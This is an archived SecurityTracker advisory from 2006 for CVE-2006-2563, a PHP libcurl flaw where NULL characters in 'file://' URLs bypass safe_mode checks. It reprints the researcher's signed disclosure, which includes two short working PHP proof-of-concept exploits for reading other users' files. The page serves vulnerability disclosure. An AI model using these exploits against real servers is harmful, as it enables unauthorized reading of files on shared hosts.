Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PHP libcurl Bug in Processing 'file://' URLs Containing NULL Characters Lets Users Bypass Safe Mode Restrictions
|
|
SecurityTracker Alert ID: 1016175
|
|
SecurityTracker URL: http://securitytracker.com/id?1016175
|
|
CVE Reference: CVE-2006-2563
(Links to External Site)
|
Date: May 30 2006
|
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 4.4.2 and 5.1.4
|
Description: A vulnerability was reported in PHP libcurl. A user may be able to bypass safe mode restrictions.
A user that can create PHP on the target system or affect data passed to a PHP script may be able to pass a specially crafted URL
to bypass PHP safe_mode security checks and include files from the script's directory.
The flaw can be triggered by 'file://'
URLs that contain NULL characters.
The vulnerability resides in 'ext/curl/interface.c'.
Maksymilian Arciemowicz of SecurityReason.com
reported this vulnerability.
The original advisory is available at:
http://securityreason.com/news/0/0x18
|
Impact: A user may be able to cause the affected script to include unintended files.
|
Solution: The vendor has issued a fix, available via CVS.
|
Vendor URL: www.php.net/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: cxib@securityreason.com
|
Message History:
None.
|
Source Message Contents
|
Date: 26 May 2006 23:24:51 -0000
From: cxib@securityreason.com
Subject: cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 15.5.2006
- -Public: 27.5.2006
from SECURITYREASON.COM
CVE-2006-2563
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with
a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generat
ed pages quickly.
A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.p
hp on the Zend website. Also,
much of the PHP Conference Material is freely available.
The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally in
correct to try to solve this
problem at the PHP level, but since the alternatives at the web server and OS levels aren't very rea
listic, many people, especially
ISP's, use safe mode for now.
PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicat
e to many different types of
servers with many different types of protocols. libcurl currently supports the http, https, ftp, gop
her, telnet, dict, file, and
ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this c
an also be done with PHP's ftp
extension), HTTP form based upload, proxies, cookies, and user+password authentication.
These functions have been added in PHP 4.0.2.
- --- 1. Safe Mode Bypass in cURL---
General problem exists in cURL functions, because are changed safe_mode, strings 0 (\x00) are change
to "_". Next bug exists in prefix
file://, becaluse safe_mode checks only path at file:///.
Example:
- -Safe_Mode bypass exploit.1---
<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.1---
Safe_mode checks only access only to __FILE__. But cURL include filethatyoudonthaveaccessto.php. So y
ou can include any files from
directory where script is.
But in this exploit, you can only read files from directory where is this script. You can't use "
/".
There is another conception for an exploit: if you have an access to a directory (rights) where you w
ant to read files. So, if you
want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"
,
you should make a dir like
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":
- -Safe_Mode bypass exploit.2---
<?
$ch = curl_init("file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php\x00/.
./../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.2---
Safe mode checks access to file
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../Yo
urFile.php"
And cURL include only
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"
because \x00 are ending path to file.
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/
- --- 3. Greets ---
For: sp3x
and
p_e_a, l5x, Infospec, pi3, eax
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)
iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk
v8npsbXGJqmJRiAT9lnCyv8=
=mI80
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
